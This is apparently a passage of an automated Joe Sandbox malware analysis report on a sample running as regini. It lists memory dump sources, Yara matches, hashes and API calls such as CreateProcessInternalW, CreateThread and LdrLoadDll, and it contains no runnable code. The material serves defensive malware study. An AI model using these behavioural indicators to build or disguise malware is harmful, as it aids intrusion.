                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                              • Instruction ID: 543774f7e8848665e136c1e0f34eddc367816028f2ef09b3cb3deb809d18aca6
                                                                              • Opcode Fuzzy Hash: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                              • Instruction Fuzzy Hash: AB900435313404031105F75C474454700C7C7D53513D5C031F1415554CD731CD715131
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                              • Instruction ID: 6a6754bd2313b40ec769639cad49c7e8b135cf34327a501fa8046361ee866ac6
                                                                              • Opcode Fuzzy Hash: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                              • Instruction Fuzzy Hash: 67900225222404021145F658464454B048697D63513D5C015F1816594CC72189655321
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                              • Instruction ID: eb156590f21a9b630ce5d02182779a646c02addbd681235926ae6803285b9f27
                                                                              • Opcode Fuzzy Hash: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                              • Instruction Fuzzy Hash: 2190022124645502E150B25C84446564046A7E0301F95C021A0C14598D865589556221
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                              • Instruction ID: c0a0d0c4ee9ba504824587f5a3972a5381c4084f3c484e40d383d1b7c7ac4cc6
                                                                              • Opcode Fuzzy Hash: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                              • Instruction Fuzzy Hash: CE90026134240842E100B2588454B460046C7E1301F95C015E1464558D8719CD526126
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                              • Instruction ID: 65afde1f8cfe999067e12f5c41dbe510717b95ea0f6be72c69ea0bf165d23a1e
                                                                              • Opcode Fuzzy Hash: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                              • Instruction Fuzzy Hash: E5900221602404425140B268C8849464046ABE1311795C121A0D98554D865989655665
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                              • Instruction ID: 03b7dc2d073b18c54f35ab2ab09424512d4a4b3285f8a516415e83477771e312
                                                                              • Opcode Fuzzy Hash: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                              • Instruction Fuzzy Hash: 1A900221212C0442E200B6688C54B47004687D0303F95C115A0554558CCA1589615521
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                              • Instruction ID: 978006cc818ad45688e9bf3326130e6f60e5a08615a408aec7e73aba200f319b
                                                                              • Opcode Fuzzy Hash: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                              • Instruction Fuzzy Hash: 2090022160240902E101B2588444656004B87D0341FD5C022A1424559ECB258A92A131
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 0-962170130

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 028C0FA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4752
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,028C84DE,00000010,?,?,?,00000044,?,00000010,028C84DE,?,?,?), ref: 028D9B50
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9EF5
Memory Dump Source
• Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9EF5
Memory Dump Source
• Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• RtlAllocateHeap.NTDLL(028C1BC9,?,028D5CCB,028C1BC9,028D585F,028D5CCB,?,028C1BC9,028D585F,00001000,?,?,00000000), ref: 028D9A4F
Memory Dump Source
• Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,D98E1704,00000007,00000000,00000004,00000000,028C3F5D,000000F4), ref: 028D9A9C
Memory Dump Source
• Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,028C1EC0,028D819F,028D585F,028C1E83), ref: 028C8343
Memory Dump Source
• Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
• Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3000000_regini.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0